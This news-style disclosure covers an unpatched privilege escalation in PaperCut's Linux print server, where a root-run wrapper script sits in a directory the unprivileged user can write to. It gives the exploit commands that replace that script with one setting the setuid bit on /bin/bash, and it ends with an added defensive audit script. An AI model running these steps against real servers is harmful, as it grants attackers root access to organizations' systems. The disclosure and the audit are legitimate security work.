Researcher Details Unpatched Papercut Privilege Escalation Vulnerability

Papercut Privilege Escalation

In the interconnected world of software and cybersecurity, even the most seemingly innocuous applications can harbor dangerous vulnerabilities. This is the story of Papercut, a widely used printing management software, and how a security researcher uncovered a critical flaw that could turn a lowly printer into a stepping stone for hackers.

Martin Mielke, a security researcher, was probing the latest version of Papercut (version 22.0.12) installed on an Ubuntu 22.04 system. Papercut, software compatible with major brands and platforms, is a mainstay in organizations worldwide. It’s a vital cog in the printing operations of large companies, state organizations, and educational institutes, serving hundreds of millions across over 100 countries.

Mielke’s installation was unassuming, utilizing a low-privileged user account named ‘papercut’. The crux of the issue lay in how Papercut handled certain web application functionalities. Mielke discovered that by accessing the application admin panel via port 9191 and navigating to a specific page, he could execute commands as the root user, despite being logged in with limited privileges.

This privilege escalation was possible because a script is executed with root privileges (`/bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key`) even though it resides in the directory of the ‘papercut’ user. That user can replace the script with any binary or shell script, which allowed Mielke to execute arbitrary commands with root privileges.

To exploit this vulnerability, Mielke replaced the ‘server-command’ file with a script that altered the permissions of the bash shell, granting it setuid permissions. By doing so, any command run through the bash shell would execute with root privileges, effectively elevating the rights of the low-privileged ‘papercut’ user to that of the root user.

To execute the attack, run the following commands as the low-privileged “papercut” user:

```
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command

#!/bin/sh
#
# (c) Copyright 1999-2013 PaperCut Software International Pty Ltd
#
# A wrapper for server-command
#

. `dirname $0`/.common

export CLASSPATH
${JRE_HOME}/bin/java \
-Djava.io.tmpdir=${TMP_DIR} \
-Dserver.home=${SERVER_HOME} \
-Djava.awt.headless=true \
-Djava.locale.providers=COMPAT,SPI \
-Dlog4j.configurationFile=file:${SERVER_HOME}/lib/log4j2-command.properties \
-Xverify:none \
biz.papercut.pcng.server.ServerCommand \
"$@"

papercut@research:~$ mv /home/papercut/server/bin/linux-x64/server-command /home/papercut/server/bin/linux-x64/server-command.bak
papercut@research:~$ echo "#!/bin/bash" > /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ echo 'chmod u+s /bin/bash' >> /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ chmod +x /home/papercut/server/bin/linux-x64/server-command

papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/bash
chmod u+s /bin/bash
```

Confirm root privileges:

The implications of this discovery were alarming. Not only did it highlight a significant oversight in Papercut’s security architecture, but it also underscored the potential risks associated with seemingly benign software components. The vulnerability, reported six months prior, remained unaddressed in the latest version (23.0.3), raising concerns about the pace of security updates in critical software.
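
A defensive check for the condition described above, as an added example that is not from the original article or from PaperCut: it walks from a root-executed file up through its parent directories, flags every component a non-root account can modify, and tests a binary for the setuid bit. The function names are hypothetical, the default paths are the ones quoted in the article, and a `find` that accepts numeric IDs for `-user` is assumed.

```shell
#!/bin/sh
# Added audit example (not PaperCut code); function names are hypothetical.

# untrusted_can_modify PATH [TRUSTED_UID]
# Succeeds when PATH is not owned by TRUSTED_UID (default 0, root) or is
# group/world-writable, i.e. a non-root account can alter or replace it.
untrusted_can_modify() {
    [ -n "$(find "$1" -prune \( ! -user "${2:-0}" -o -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# audit_exec_chain FILE TOP [TRUSTED_UID]
# Checks FILE and each parent directory up to and including TOP. Prints every
# weak component and returns how many were found (0 = chain is controlled).
audit_exec_chain() {
    cur=$1 top=$2 uid=${3:-0} bad=0
    while :; do
        if untrusted_can_modify "$cur" "$uid"; then
            echo "WEAK: $cur"
            bad=$((bad + 1))
        fi
        # Stop at TOP, at the filesystem root, or when a relative path runs out.
        case $cur in "$top"|/|.) break ;; esac
        cur=$(dirname "$cur")
    done
    return "$bad"
}

# has_setuid FILE: succeeds when the setuid bit is set, which is the trace
# the replacement script shown in the article leaves on /bin/bash.
has_setuid() {
    [ -n "$(find "$1" -prune -perm -4000 -print 2>/dev/null)" ]
}

# Default target is the wrapper path quoted in the article; skipped if absent.
target=${1:-/home/papercut/server/bin/linux-x64/server-command}
if [ -e "$target" ]; then
    audit_exec_chain "$target" / ||
        echo "FINDING: a file executed as root can be replaced by a non-root account"
    if has_setuid /bin/bash; then
        echo "ALERT: /bin/bash is setuid"
    fi
fi
```

A directory counts as weak because whoever can write to it can rename or replace the files inside it, which is why the walk covers the parents and not only the script itself.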